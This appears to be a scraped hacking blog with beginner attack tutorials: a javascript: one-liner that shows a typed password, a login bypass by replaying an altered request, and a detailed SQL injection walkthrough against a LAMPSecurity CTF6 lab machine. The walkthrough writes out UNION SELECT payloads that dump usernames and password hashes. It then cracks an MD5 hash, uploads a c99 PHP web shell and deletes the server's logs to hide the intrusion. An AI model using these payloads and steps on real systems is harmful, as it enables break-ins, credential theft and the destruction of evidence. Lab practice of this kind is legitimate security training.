-: Reveal *****(Asterisk) Passwords Using Javascript N00b Friendly:-

Want to Reveal the Passwords Hidden Behind Asterisk (****) ? 


Follow the steps given below- 


1) Open the Login Page of any website. (eg. http://mail.yahoo.com)  


2) Type your 'Username' and 'Password'. 


3) Copy and paste the JavaScript code given below into your browser's address bar and press  
'Enter'. 


                    javascript: alert(document.getElementById('Passwd').value);  


4) As soon as you press 'Enter', A window pops up showing Password typed by you..! 


 Note :-   This trick may not be working with firefox.   

Solution How to compile Exploits For N00b Friendlly

This summary is not available. Please click here to view the post.

Login Form Bypass using Mantra Security Toolkit

Hi All,

In this tutorial we will try to bypass login form of vulnerable website using Mantra Security Toolkit

What all you need

1. Mantra Security Toolkit - Download

2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6

Let's begin,

Step 1:

I'm on the home page of the website now

http://192.168.132.128/

Step 2:

Login form of the website

http://192.168.132.128/?action=login

Step 3:

Now we will test the input forms against SQL injection. For that we can use SQL Inject Me tool. It can be launched from Tools > SQL Inject Me > Open SQL Inject Me Sidebar




Step 4:

You can see SQL Inject Me sidebar on the right




Step 5:

I'm checking all the fields to test.




Step 6:

I clicked on "Test all forms with all attacks"




Step 7:

Test results says that none of the fields are vulnerable to SQL injection attack. So its confirmed that the website is sanitizing the input





Step 8:

Now we will try to see what type of sanitizing mechanism the website is employed. For that we will use Firebug. It can be launched by going to Tools > Firebug > Open Firebug





Step 9:

Now that firebug is open. I'm enabling Inspect mode of Firebug clicking on the inspect icon (second one) on the top left corner.





Step 10:

I clicked on the login from and Firebug highlighted respective source code. It shows that some type of local JavaScript is used to sanitize the input.





Step 11:

For bypassing it, we will use Live HTTP Headers. It can be launched either from sidebar or by going to Tools > Live HTTP Headers





Step 12:

Now you can see Live HTTP Headers. The Capture check box must be checked.





Step 13:

I went back to the login from and entered some sample values there and pressed on Log In




Step 14:

Now I again went back to Live HTTP Headers. We can clearly see that it captured the session.





Step 15:

I scrolled it up to find the username, password data field. I clicked on it and pressed on Replay button





Step 16:

I'm changing the value little bit to bypass the authentication and clicking on Replay button




Step 17:
hmmm. I got an error message. Looks like I should modify the injected code.



Step 18:

I modified the code




Step 19:

No luck




Step 18:

I changed the value again and pressed on Replay button




Step 19:

Voila. I'm successfully authenticated.




Step 20:

Now that I have got admin access



If you wish to completely root the whole server, you can go to this post and follow steps from step 24 

Advanced SQL Injection Tutorial - Complete website rooting

Hi All,

In this tutorial we will be rooting a vulnerable web server using Mantra Security Toolkit.

What all you need

1. Mantra Security Toolkit - Download

2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6

3. Any PHP Shell you are comfortable with
- Google for "c99 shell"

Now the process


Step 1:

I'm on the home page of the website now

http://192.168.132.128/

Step 2:

I went through all the pages of web site and found a page with URL input

http://192.168.132.128/?id=13

Step 3:

I launched Hackbar by pressing F9




Step 4:

The power of single quote. I'm checking the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.

http://192.168.132.128/?id=13'

Since the page content is different from the previous one. I can make sure that the web page is vulnerable.


Step 5:

Lets find out the number of tables

http://192.168.132.128/?id=13 order by 1

Step 6:

I have to keep on increasing the last number till I see any changes in the page. In usual practice its gonna be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on + button till I see any changes on the webpage

http://192.168.132.128/?id=13 order by 7

Step 7:

I went up to 7 and no change till now

http://192.168.132.128/?id=13 order by 7

Step 8:

I'm on 8 now and I can see the page changed

http://192.168.132.128/?id=13 order by 8

Step 9:

Now lets go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT





Step 10:

I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exists and there are only 7 tables





Step 11:

Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2

http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7

Step 12:

I replaced number 2 in URL with another SQL command, it got executed and result is displayed on the page

http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7

The current user is cms_user@localhost



Step 13:

Lets find out the version of the database. I replaced 2 in the URL with version() command

http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,7

5.0.45 is the version



Step 14:

Let me list all the tables

http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tables

From this list I found "user" is an interesting table



Step 15:

Now I listed all the columns and its a big list

http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns

Step 16:

I want columns from the table "user" and nothing else

http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'

Step 17:

Lets find the user name

http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from user

Step 18:

Now, what about password

http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from user

Its encrypted



Step 19:

Decrypting the password. I copied the MD5 hash, pasted it into hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com





Step 20:

Voila.!!! I got the password





Step 21:

Finding the log in page. Its was right in front of me




Step 22:

Logging in with the credentials I have




Step 23:

Greetings.!!!





Step 24:

I'm an admin now. Look at my powers.





Step 25:

Let me add an event





Step 26:

and of course I want to upload a picture





Step 27:

Lets see it allows me to upload the shell or not





Step 28:

Now I'm pressing on "Add Event" button





Step 29:

Nice. Looks like it's got uploaded





Step 30:

Let's see where the shell got uploaded to





Step 31:

I'm trying to get the default upload location







Step 32:

Looks like I got it



Let me click on the c9shell.php file I just uploaded



Step 33:

Voila. I have shell access





Step 34:

I simply clicked on the up button to get the root folder



Now I can do whatever I wish. Deface the website, maintaining access or what ever. But its out of the scope of current tutorial



Step 35:

What I'm interested is the log folder






Step 36:

I clicked on the log.log file and it has the logs of my noisy SQL injection attacks





Step 37:

Let me go back and edit the log file







Step 38:

I deleted complete log entries. Now saving it.





Step 39:

Nice. Log file is empty now





Step 40:

Now. Lets remove the c99 shell by pressing on Self Remove





Step 41:

Confirmed.!!!





Step 42:

OK. Good Bye C99





Step 43:

Well. It got deleted itself

H4qqy H4ck!ng